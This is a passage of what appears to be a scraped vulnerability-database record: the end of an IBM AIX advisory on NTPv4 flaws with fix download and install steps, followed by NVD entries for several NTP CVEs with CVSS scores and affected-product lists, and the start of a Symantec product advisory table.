By sending an overly \n long string argument, a local attacker could overflow a buffer and \n execute arbitrary code on the system with elevated privileges or \n cause the application to crash.\n CVSS Base Score: 5.9\n CVSS Temporal Score: See \n https://exchange.xforce.ibmcloud.com/vulnerabilities/145120\n for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n CVEID: CVE-2018-7170\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7170\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7170\n DESCRIPTION: NTP could allow a remote authenticated attacker to bypass \n security restrictions, caused by a Sybil attack. By creating many \n ephemeral associations, an attacker could exploit this vulnerability \n to win the clock selection of ntpd and modify a victim's clock. \n CVSS Base Score: 3.1\n CVSS Temporal Score: See \n https://exchange.xforce.ibmcloud.com/vulnerabilities/139786\n for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N)\n\n\n AFFECTED PRODUCTS AND VERSIONS:\n \n AIX 6.1, 7.1, 7.2\n VIOS 2.2.x \n\n The vulnerabilities in the following filesets are being addressed:\n \n key_fileset = aix\n\n For NTPv4:\n\n Fileset Lower Level Upper Level KEY PRODUCT(S)\n ---------------------------------------------------------------------\n ntp.rte 7.4.2.8100 7.4.2.8110 key_w_fs NTPv4\n\n \n To find out whether the affected filesets are installed \n on your systems, refer to the lslpp command found in AIX user's guide.\n\n Example: lslpp -L | grep -i ntp.rte\n\n\n REMEDIATION:\n\n FIXES\n\n AIX and VIOS fixes are available.\n\n The AIX/VIOS fixes can be downloaded via ftp or http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/ntp_fix11.tar\n http://aix.software.ibm.com/aix/efixes/security/ntp_fix11.tar\n https://aix.software.ibm.com/aix/efixes/security/ntp_fix11.tar \n\n The link above is to a tar file 
containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n \n For NTPv4:\n\n AIX Level Interim Fix (*.Z) KEY PRODUCT(S)\n ----------------------------------------------------------\n 6.1.x IJ10280s3b.181206.epkg.Z key_w_fix NTPv4\n 7.1.x IJ10280s3b.181206.epkg.Z key_w_fix NTPv4\n 7.2.x IJ10280s3b.181206.epkg.Z key_w_fix NTPv4\n\n VIOS Level Interim Fix (*.Z) KEY PRODUCT(S)\n -----------------------------------------------------------\n 2.2.x IJ10280s3b.181206.epkg.Z key_w_fix NTPv4\n\n To extract the fixes from the tar file:\n\n tar xvf ntp_fix11.tar \n cd ntp_fix11\n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command as the following:\n\n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n 000891c62f5e59c34909399d0ef4c74c72048a4fc1e7e50b66dedaa4fcf0ee87 IJ10280s3b.181206.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM Support at\n http://ibm.com/support/ and describe the discrepancy. 
\n \n openssl dgst -sha1 -verify [pubkey_file] -signature [advisory_file].sig [advisory_file]\n \n openssl dgst -sha1 -verify [pubkey_file] -signature [ifix_file].sig [ifix_file]\n\n Published advisory OpenSSL signature file location:\n \n http://aix.software.ibm.com/aix/efixes/security/ntp_advisory11.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/ntp_advisory11.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/ntp_advisory11.asc.sig \n\n FIX AND INTERIM FIX INSTALLATION\n\n If possible, it is recommended that a mksysb backup of the system \n be created. Verify it is both bootable and readable before\n proceeding.\n\n The fix will not take effect until any running xntpd servers\n have been stopped and restarted with the following commands:\n\n stopsrc -s xntpd\n startsrc -s xntpd\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n After installation the ntp daemon must be restarted:\n\n stopsrc -s xntpd\n startsrc -s xntpd\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n WORKAROUNDS AND MITIGATIONS:\n\n None.\n\n\n===============================================================================\n\nCONTACT US:\n\n Note: Keywords labeled as KEY in this document are used for 
parsing\n purposes.\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Contact IBM Support for questions related to this announcement:\n\n http://ibm.com/support/\n https://ibm.com/support/\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n ftp://ftp.software.ibm.com/systems/power/AIX/systems_p_os_aix_security_pubkey.txt\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n \n Complete CVSS v3 Guide: http://www.first.org/cvss/user-guide\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n\n\nRELATED INFORMATION:\n\n IBM Secure Engineering Web Portal\n http://www.ibm.com/security/secure-engineering/bulletins.html\n\n IBM Product Security Incident Response Blog\n https://www.ibm.com/blogs/psirt/\n\n Security Bulletin: Vulnerabilities in NTPv4 affect AIX (CVE-2018-12327,\n CVE-2018-7170)\n https://www-01.ibm.com/support/docview.wss?uid=ibm10744497\n\nACKNOWLEDGEMENTS:\n\n None.\n\n\nCHANGE HISTORY:\n\n First Issued: Fri Dec 14 12:20:13 CST 2018\n\n\n===============================================================================\n\n*The CVSS Environment Score is customer environment specific and will \nultimately impact the Overall CVSS Score. Customers can evaluate the impact \nof this vulnerability in their environments by accessing the links in the \nReference section of this Security Bulletin. 
\n\nDisclaimer\nAccording to the Forum of Incident Response and Security Teams (FIRST), the \nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard \ndesigned to convey vulnerability severity and help to determine urgency and \npriority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY \nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS \nFOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT \nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n\n", "edition": 3, "modified": "2018-12-14T12:20:13", "published": "2018-12-14T12:20:13", "id": "NTP_ADVISORY11.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/ntp_advisory11.asc", "title": "There are vulnerabilities in NTPv4 that affect AIX.", "type": "aix", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2021-02-02T06:52:41", "description": "ntpd in ntp 4.2.x before 4.2.8p7 and 4.3.x before 4.3.92 allows authenticated users that know the private symmetric key to create arbitrarily-many ephemeral associations in order to win the clock selection of ntpd and modify a victim's clock via a Sybil attack. 
This issue exists because of an incomplete fix for CVE-2016-1549.", "edition": 11, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 5.3, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2018-03-06T20:29:00", "title": "CVE-2018-7170", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7170"], "modified": "2020-06-18T14:01:00", "cpe": ["cpe:/a:netapp:hci:-", "cpe:/a:ntp:ntp:4.2.8", "cpe:/a:netapp:solidfire:-"], "id": "CVE-2018-7170", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7170", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p4:*:*:*:*:*:*", "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta5:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc2:*:*:*:*:*:*", 
"cpe:2.3:a:ntp:ntp:4.2.8:p5:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta4:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc1:*:*:*:*:*:*", "cpe:2.3:a:netapp:hci:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:-:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:41", "description": "The protocol engine in ntp 4.2.6 before 4.2.8p11 allows a remote attackers to cause a denial of service (disruption) by continually sending a packet with a zero-origin timestamp and source IP address of the \"other side\" of an interleaved association causing the victim ntpd to reset its association.", "edition": 11, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2018-03-06T20:29:00", "title": "CVE-2018-7185", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7185"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", 
"cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/a:netapp:hci:-", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/a:ntp:ntp:4.2.8", "cpe:/a:netapp:solidfire:-", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2018-7185", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7185", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p4:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta3:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta5:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p10:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p5:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta4:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc1:*:*:*:*:*:*", "cpe:2.3:a:netapp:hci:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p7:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:-:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p9:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:52:41", "description": "Buffer overflow in the decodearr function in ntpq in ntp 4.2.8p6 through 4.2.8p10 allows remote 
attackers to execute arbitrary code by leveraging an ntpq query and sending a response with a crafted array.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-08T20:29:00", "title": "CVE-2018-7183", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7183"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:freebsd:freebsd:10.4", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/a:ntp:ntp:4.2.8", "cpe:/o:freebsd:freebsd:10.3", "cpe:/a:netapp:element_software:-", "cpe:/o:freebsd:freebsd:11.1", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2018-7183", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7183", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:10.4:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:element_software:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:freebsd:freebsd:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p10:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:10.3:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p7:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p9:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:52:41", "description": "The ctl_getitem method in ntpd in ntp-4.2.8p6 before 4.2.8p11 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted mode 6 packet with a ntpd instance from 4.2.8p6 through 4.2.8p10.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-03-06T20:29:00", "title": "CVE-2018-7182", "type": "cve", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7182"], "modified": "2019-10-31T19:15:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/a:ntp:ntp:4.2.8", 
"cpe:/a:netapp:element_software:-"], "id": "CVE-2018-7182", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7182", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:element_software:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p10:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p7:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p9:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:41", "description": "ntpd in ntp 4.2.8p4 before 4.2.8p11 drops bad packets before updating the \"received\" timestamp, which allows remote attackers to cause a denial of service (disruption) by sending a packet with a zero-origin timestamp causing the association to reset and setting the contents of the packet as the most recent timestamp. This issue is a result of an incomplete fix for CVE-2015-7704.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-03-06T20:29:00", "title": "CVE-2018-7184", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7184"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/a:synology:diskstation_manager:6.1", "cpe:/a:synology:router_manager:1.1", "cpe:/a:netapp:cloud_backup:-", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:synology:vs960hd_firmware:-", "cpe:/a:synology:virtual_diskstation_manager:-", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/a:ntp:ntp:4.2.8", "cpe:/a:synology:diskstation_manager:6.0", "cpe:/a:synology:diskstation_manager:5.2", "cpe:/a:netapp:steelstore_cloud_integrated_storage:-", "cpe:/a:synology:skynas:-", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2018-7184", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7184", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:synology:diskstation_manager:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p4:*:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:14.2:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:synology:vs960hd_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:a:synology:router_manager:1.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:a:synology:diskstation_manager:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p10:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p5:*:*:*:*:*:*", "cpe:2.3:a:synology:diskstation_manager:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p7:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:synology:skynas:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p9:*:*:*:*:*:*", 
"cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:a:synology:virtual_diskstation_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:28:03", "description": "A malicious authenticated peer can create arbitrarily-many ephemeral associations in order to win the clock selection algorithm in ntpd in NTP 4.2.8p4 and earlier and NTPsec 3e160db8dc248a0bcb053b56a80167dc742d2b74 and a5fb34b9cc89b92a8fef2f459004865c93bb7f92 and modify a victim's clock.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-01-06T21:59:00", "title": "CVE-2016-1549", "type": "cve", "cwe": ["CWE-19"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1549"], "modified": "2018-03-28T01:29:00", "cpe": ["cpe:/a:ntp:ntp:4.2.8"], "id": "CVE-2016-1549", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1549", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p4:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2021-01-15T20:46:38", "bulletinFamily": "software", 
"cvelist": ["CVE-2018-7170", "CVE-2018-7174", "CVE-2018-7182", "CVE-2018-7183", "CVE-2018-7184", "CVE-2018-7185"], "description": "### SUMMARY\n\nSymantec Network Protection products using affected versions of the NTP reference implementation from ntp.org are susceptible to multiple vulnerabilities. A remote attacker can exploit these vulnerabilities to execute arbitrary code, modify the target's system time, prevent the target from updating its system time, and cause denial of service through application crashes. \n \n\n\n### AFFECTED PRODUCTS \n\nThe following products are vulnerable:\n\n**Content Analysis** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2018-7182, CVE-2018-7183, \nCVE-2018-7184 | 2.4 and later | Not vulnerable, fixed in 2.4.1.1 \n2.3 | Upgrade to 2.3.5.1. \n2.1, 2.2 | Upgrade to a later version with fixes. \n \n \n\nDirector \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 6.1 | Upgrade to a version of MC with the fixes. \n \n \n\n**Mail Threat Defense** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2018-7182, CVE-2018-7183, \nCVE-2018-7184 | 1.1 | Upgrade to a version of CAS and SMG with the fixes. \n \n \n\n**Management Center** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2018-7182, CVE-2018-7183, \nCVE-2018-7184 | 2.1 and later | Not vulnerable, fixed in 2.1.1.1. \n1.11, 2.0 | Upgrade to a later version with fixes. \n \n \n\n**Reporter** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2018-7170, CVE-2018-7185 | 10.5 | Not vulnerable, fixed in 10.5.1.1 \n10.3, 10.4 (has vulnerable code, but not vulnerable to known vectors of attack) | Upgrade to a later version with fixes. \nCVE-2018-7182, CVE-2018-7183, \nCVE-2018-7184 | 10.1, 10.2 | Upgrade to a later version with fixes. 
